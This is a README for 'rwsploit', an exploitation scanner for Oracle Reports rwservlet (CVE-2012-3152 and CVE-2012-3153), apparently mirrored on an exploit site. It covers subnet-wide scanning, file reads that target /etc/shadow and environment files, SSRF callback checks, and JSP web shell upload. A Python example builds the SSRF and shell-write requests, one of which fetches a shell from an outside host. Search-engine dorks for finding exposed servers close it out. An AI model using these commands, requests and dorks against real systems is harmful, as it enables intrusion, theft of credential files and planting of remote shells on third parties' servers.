## https://sploitus.com/exploit?id=3F90DA9C-C8D3-574C-B1CC-AEF89D90FF98
# Oracle Reports rwservlet Scanner
> ⚠️ **For authorized use only. Only run this tool against systems you own or have explicit written permission to test. Unauthorized use is illegal.**
A focused exploitation scanner for Oracle Reports Server (`rwservlet`) targeting **CVE-2012-3152** and **CVE-2012-3153** on unpatched Reports installs. It automates detection, LFI file reads, SSRF testing, and JSP shell upload across single IPs, CIDR ranges, or target lists, and a TCP/HTTP pre-filter skips dead hosts up front so no time is spent sending payloads to them.
---
## Installation
```bash
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests
```
Python 3.8+ required. No other dependencies.
---
## Usage
```bash
python3 rwsploit.py -t [options]
python3 rwsploit.py -f [options]
```
Run with no arguments to see the full help menu and recon dorks.
---
## Options
| Flag | Description | Default |
|------|-------------|---------|
| `-t` | Target IP, hostname, or CIDR. Multiple values accepted. | none (required unless `-f` is given) |
| `-f` | File with one IP or CIDR per line. `#` starts a comment. | none (required unless `-t` is given) |
| `-p` | Single custom port; overrides the default port list. | `80 443 8080 7777 7778 7779 8443 9090` |
| `-T` | Concurrent threads. | `15` |
| `-o` | Save LFI dumps to disk with this prefix, e.g. `-o loot` writes `loot___.txt`. | stdout only |
| `--timeout` | Request timeout in seconds. | `10` |
| `--lfi` | Run LFI file-read payloads. The OS is detected first so only the matching payload set runs. | off |
| `--no-ssrf` | Skip the SSRF webhook test. | off |
| `--shell` | Upload a JSP shell. Prompts for the URL serving your shell content. | off |
| `-h` | Show help and recon dorks. | n/a |
---
## Examples
```bash
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777
# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi
# Full chain: LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell
# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot
# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf
```
**targets.txt format**
```
# comment lines are skipped
10.10.10.55
10.10.11.0/24
```
---
## Features
### LFI
Reads files the `rwservlet` process can open, after detecting the OS via `showenv` so that only the matching payload set runs. Note that `/etc/shadow` only comes back when the Reports service runs with enough privilege to read it.
**Linux:** `/etc/passwd`, `/etc/shadow`, `/etc/hosts`, `/etc/issue`, `/etc/os-release`, `/etc/group`, `/etc/crontab`, `/etc/timezone`, `/proc/version`, `/proc/cmdline`, `/proc/self/environ`
**Windows:** `win.ini`, `system32\drivers\etc\hosts`, `boot.ini`, `system.ini`, `AUTOEXEC.BAT`
> 🚨 No LFI output does not mean the target is safe: Oracle's configuration and file permissions vary. Always test SSRF and shell upload independently.
### SSRF
Fires `rwservlet?JOBTYPE=rwurl&URLPARAMETER=` with a freshly created [webhook.site](https://webhook.site) URL as the parameter and polls the webhook.site API for a callback, printing the source IP, method, and User-Agent on a hit. The webhook token is created automatically at startup. A missing callback is inconclusive on networks where the Reports server has no internet egress, so treat it as "untested", not "not vulnerable".
### Shell Upload (`--shell`)
1. Prompts for the URL serving your JSP shell content
2. Reads `PATH_TRANSLATED` from `showenv` to get the real webroot path
3. Generates a random shell name (e.g. `kxqbrmfa.jsp`)
4. Writes it via: `rwservlet?report=xyzzy&destype=file&desname=&JOBTYPE=rwurl&URLPARAMETER=`
5. Verifies by checking the shell URL for HTTP 200 and prints the live link
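The following is an added example, not rwsploit's own code, that works through the pieces of the LFI, SSRF and shell-upload steps above that can be shown offline: parsing `showenv`, fingerprinting the OS to pick the payload set, deriving the webroot from `PATH_TRANSLATED`, and building the SSRF probe and the `destype=file` write request from the parameters the README lists. Assumptions, labelled in the code: `showenv` is modelled as an HTML table of NAME/VALUE rows (real output may differ, so plain `NAME=VALUE` lines are accepted too), `PATH_TRANSLATED` ends in the request's path-info (`/showenv`) so its directory is the webroot, the written file is served under the `rwservlet` parent path, and the sample page and target addresses are constructed.

```python
"""showenv parsing, OS fingerprinting and request construction for the LFI,
SSRF and shell-upload steps. Added example, not rwsploit's own code.

Assumptions: showenv is an HTML table of NAME/VALUE rows (NAME=VALUE lines
are accepted as a fallback); PATH_TRANSLATED ends in '/showenv', so its
directory is the webroot; the written file is served under the rwservlet
parent path. CONSTRUCTED_SHOWENV and all addresses are made up.
"""
import html
import ntpath
import posixpath
import random
import re
import string
from urllib.parse import urlencode

# Payload sets from the README's LFI section.
LINUX_FILES = ["/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/issue",
               "/etc/os-release", "/etc/group", "/etc/crontab", "/etc/timezone",
               "/proc/version", "/proc/cmdline", "/proc/self/environ"]
WINDOWS_FILES = ["win.ini", r"system32\drivers\etc\hosts", "boot.ini",
                 "system.ini", "AUTOEXEC.BAT"]

CONSTRUCTED_SHOWENV = """<html><body><h2>Reports Servlet Environment</h2>
<table>
<tr><td>SERVER_SOFTWARE</td><td>Oracle-HTTP-Server</td></tr>
<tr><td>PATH_TRANSLATED</td><td>/u01/app/oracle/reports/showenv</td></tr>
<tr><td>QUERY_STRING</td><td>a=1&amp;b=2</td></tr>
</table></body></html>"""

_NAME = r"[A-Za-z_][A-Za-z0-9_]*"
_ROW = re.compile(r"<td[^>]*>\s*(" + _NAME + r")\s*</td>\s*<td[^>]*>(.*?)</td>", re.S | re.I)

def _strip_tags(fragment):
    return html.unescape(re.sub(r"<[^>]+>", "", fragment)).strip()

def parse_showenv(page):
    """Return showenv's NAME -> VALUE pairs as a dict."""
    env = {m.group(1): _strip_tags(m.group(2)) for m in _ROW.finditer(page)}
    if not env:  # fallback: plain NAME=VALUE lines, tags treated as separators
        for line in re.sub(r"<[^>]+>", "\n", page).splitlines():
            name, sep, value = line.partition("=")
            if sep and re.fullmatch(_NAME, name.strip()):
                env[name.strip()] = html.unescape(value.strip())
    return env

def detect_os(env):
    """'windows', 'linux' or 'unknown', from Windows-only variables or path style."""
    lowered = {k.lower(): v for k, v in env.items()}
    if "windir" in lowered or "systemroot" in lowered or lowered.get("os", "").startswith("Windows"):
        return "windows"
    path = env.get("PATH_TRANSLATED", "")
    if re.match(r"[A-Za-z]:[\\/]", path) or "\\" in path:
        return "windows"
    if path.startswith("/"):
        return "linux"
    return "unknown"

def lfi_targets(os_name):
    """Only the payload set matching the detected OS is worth sending."""
    return {"linux": LINUX_FILES, "windows": WINDOWS_FILES}.get(os_name, [])

def webroot_from_env(env, os_name):
    """Directory part of PATH_TRANSLATED (assumed to end in the path-info)."""
    path = env.get("PATH_TRANSLATED", "")
    if not path:
        return None
    return (ntpath if os_name == "windows" else posixpath).dirname(path)

def random_shell_name(length=8):
    """Eight lowercase letters plus .jsp, like the README's kxqbrmfa.jsp."""
    return "".join(random.choices(string.ascii_lowercase, k=length)) + ".jsp"

def ssrf_url(base, callback):
    """README SSRF probe: rwservlet?JOBTYPE=rwurl&URLPARAMETER=<callback>."""
    return base.rstrip("/") + "/rwservlet?" + urlencode({"JOBTYPE": "rwurl", "URLPARAMETER": callback})

def write_url(base, webroot, os_name, shell_name, source_url):
    """README write request: report=xyzzy&destype=file&desname=<path>&JOBTYPE=rwurl&URLPARAMETER=<url>."""
    join = ntpath.join if os_name == "windows" else posixpath.join
    params = {"report": "xyzzy", "destype": "file", "desname": join(webroot, shell_name),
              "JOBTYPE": "rwurl", "URLPARAMETER": source_url}
    return base.rstrip("/") + "/rwservlet?" + urlencode(params)

def verify_url(base, shell_name):
    """Assumes the webroot is served at the rwservlet parent path (/reports/)."""
    return base.rstrip("/") + "/" + shell_name

if __name__ == "__main__":
    base = "http://10.10.10.55:7777/reports"  # constructed target
    env = parse_showenv(CONSTRUCTED_SHOWENV)
    os_name = detect_os(env)
    print("os:", os_name, "payloads:", lfi_targets(os_name)[:3], "...")
    name = random_shell_name()
    root = webroot_from_env(env, os_name)
    print(ssrf_url(base, "https://webhook.site/<token>"))
    print(write_url(base, root, os_name, name, "http://10.10.14.2/shell.jsp"))
    print(verify_url(base, name))
```

`urlencode` percent-encodes the slashes and backslashes in `desname` and `URLPARAMETER`, which is what you want on the wire; if a target behaves differently with the raw characters, that is the first thing to vary when a write silently fails.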
---
## Recon Dorks for exposed Oracle Reports `rwservlet` endpoints
**Google**
```
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet
```
**Shodan**
```
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"
```
**FOFA**
```
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"
```
**Censys**
```
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"
```
---
## CVEs
| CVE | Description |
|-----|-------------|
| CVE-2012-3152 | Unauthenticated file read via `rwservlet` `report` parameter |
| CVE-2012-3153 | SSRF and file write via `JOBTYPE=rwurl` + `URLPARAMETER` |
Oracle's October 2012 Critical Patch Update lists Reports 11.1.1.4, 11.1.1.6 and 11.1.2.0 as affected by both CVEs, so an 11g install is only safe once that CPU has been applied; the older 6i, 9i and 10g releases this tool also targets are out of support.
---
## Legal
For authorized penetration testing, CTF challenges, and security research only. The author takes no responsibility for misuse.